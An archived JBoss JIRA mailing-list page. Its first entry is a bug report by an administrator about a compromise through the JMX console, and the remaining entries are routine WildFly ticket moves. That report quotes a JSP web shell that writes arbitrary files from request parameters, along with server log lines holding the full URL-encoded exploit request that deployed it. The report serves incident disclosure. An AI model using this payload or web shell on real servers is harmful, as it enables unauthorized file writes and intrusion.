April 2013 - jboss-jira - Jboss List Archives

[JBoss JIRA] (JBAS-9535) Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName

by Mike Hansen (JIRA)

Mike Hansen created JBAS-9535: --------------------------------- Summary: Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName Key: JBAS-9535 URL: https://issues.jboss.org/browse/JBAS-9535 Project: Application Server 3 4 5 and 6 Issue Type: Bug Security Level: Public (Everyone can see) Components: JMX Affects Versions: JBossAS-5.1.0.GA Environment: CentOS 5.4 Reporter: Mike Hansen I noticed a new deployment called myname.war with index.jsp which had the following inside: <% if(request.getParameter("f")!=null) (new java.io.FileOutputStream(application.getRealPath("\\") + request.getParameter("f"))).write(request.getParameter("t").getBytes() ); %> mynameok I looked into my web server logs and found the following entry: ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 - I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.) Here is the complete log of the exploit as recorded by the webserver: access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=..." "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=..." "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "-" "-" access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2" access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 - ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 211.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" - -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (AS7-4699) Use OperationBuilder.addFileAsAttachment in the ServerDeploymentManager and DomainDeploymentManager impls

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/AS7-4699?page=com.atlassian.jira.plugin.s... ] Jason Greene updated AS7-4699: ------------------------------ Parent: (was: AS7-4696) Issue Type: Task (was: Sub-task) > Use OperationBuilder.addFileAsAttachment in the ServerDeploymentManager and DomainDeploymentManager impls > --------------------------------------------------------------------------------------------------------- > > Key: AS7-4699 > URL: https://issues.jboss.org/browse/AS7-4699 > Project: Application Server 7 > Issue Type: Task > Components: Domain Management > Reporter: Brian Stansberry > Fix For: 8.0.0.Alpha1 > > > The ServerDeploymentManager and DomainDeploymentManager interfaces allow users to pass in a File. Currently we immediate convert that File to a FileInputStream and use that IS in the resulting operation. That will force an in-memory copy. Instead, use the OperationBuilder.addFileAsAttachment method introduced in the parent task. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-669) Use OperationBuilder.addFileAsAttachment in the ServerDeploymentManager and DomainDeploymentManager impls

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-669?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-4699 to WFLY-669: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-669 (was: AS7-4699) Component/s: Domain Management (was: Domain Management) Fix Version/s: 8.0.0.Alpha1 (was: 8.0.0.Alpha1) > Use OperationBuilder.addFileAsAttachment in the ServerDeploymentManager and DomainDeploymentManager impls > --------------------------------------------------------------------------------------------------------- > > Key: WFLY-669 > URL: https://issues.jboss.org/browse/WFLY-669 > Project: WildFly > Issue Type: Task > Components: Domain Management > Reporter: Brian Stansberry > Fix For: 8.0.0.Alpha1 > > > The ServerDeploymentManager and DomainDeploymentManager interfaces allow users to pass in a File. Currently we immediate convert that File to a FileInputStream and use that IS in the resulting operation. That will force an in-memory copy. Instead, use the OperationBuilder.addFileAsAttachment method introduced in the parent task. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-663) 128.3.8 Stopping the Web Application Bundle

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-663?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5201 to WFLY-663: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-663 (was: AS7-5201) Component/s: (was: OSGi) Fix Version/s: (was: 8.0.0.Alpha1) > 128.3.8 Stopping the Web Application Bundle > ------------------------------------------- > > Key: WFLY-663 > URL: https://issues.jboss.org/browse/WFLY-663 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: Thomas Diesler > > It is possible that there are one or more colliding WABs because they had the same Context Path as this stopped WAB. If such colliding WABs exists then the Web Extender must attempt to deploy the colliding WAB with the lowest bundle id. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-664) 128.5 Events

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-664?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5202 to WFLY-664: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-664 (was: AS7-5202) Component/s: (was: OSGi) > 128.5 Events > ------------ > > Key: WFLY-664 > URL: https://issues.jboss.org/browse/WFLY-664 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: Thomas Diesler > -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-665) 128.6.1 Bundle Context Access

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-665?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5203 to WFLY-665: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-665 (was: AS7-5203) Component/s: (was: OSGi) Fix Version/s: (was: EAP 6.1.0.Alpha (7.2.0.Final)) > 128.6.1 Bundle Context Access > ----------------------------- > > Key: WFLY-665 > URL: https://issues.jboss.org/browse/WFLY-665 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: David Bosschaert > -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-666) 128.6.3 Resource Lookup

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-666?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5204 to WFLY-666: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-666 (was: AS7-5204) Component/s: (was: OSGi) > 128.6.3 Resource Lookup > ----------------------- > > Key: WFLY-666 > URL: https://issues.jboss.org/browse/WFLY-666 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: Thomas Diesler > -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-667) 128.6.5 JSP Support

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-667?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5205 to WFLY-667: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-667 (was: AS7-5205) Component/s: (was: OSGi) > 128.6.5 JSP Support > ------------------- > > Key: WFLY-667 > URL: https://issues.jboss.org/browse/WFLY-667 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: Thomas Diesler > -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-659) 128.3.1 WAB Definition

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-659?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5197 to WFLY-659: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-659 (was: AS7-5197) Component/s: (was: OSGi) Fix Version/s: (was: 8.0.0.Alpha1) > 128.3.1 WAB Definition > ---------------------- > > Key: WFLY-659 > URL: https://issues.jboss.org/browse/WFLY-659 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: Thomas Diesler > -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

[JBoss JIRA] (WFLY-660) 128.3.2 Starting the Web Application Bundle

by Jason Greene (JIRA)

[ https://issues.jboss.org/browse/WFLY-660?page=com.atlassian.jira.plugin.s... ] Jason Greene moved AS7-5198 to WFLY-660: ---------------------------------------- Project: WildFly (was: Application Server 7) Key: WFLY-660 (was: AS7-5198) Component/s: (was: OSGi) > 128.3.2 Starting the Web Application Bundle > ------------------------------------------- > > Key: WFLY-660 > URL: https://issues.jboss.org/browse/WFLY-660 > Project: WildFly > Issue Type: Sub-task > Reporter: David Bosschaert > Assignee: Thomas Diesler > > The Web Extender should ensure that serving static content from the WAB does not activate the WAB when it has a lazy activation policy. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators For more information on JIRA, see: http://www.atlassian.com/software/jira

11 years, 8 months

1
0
0 / 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

jboss-jira April 2013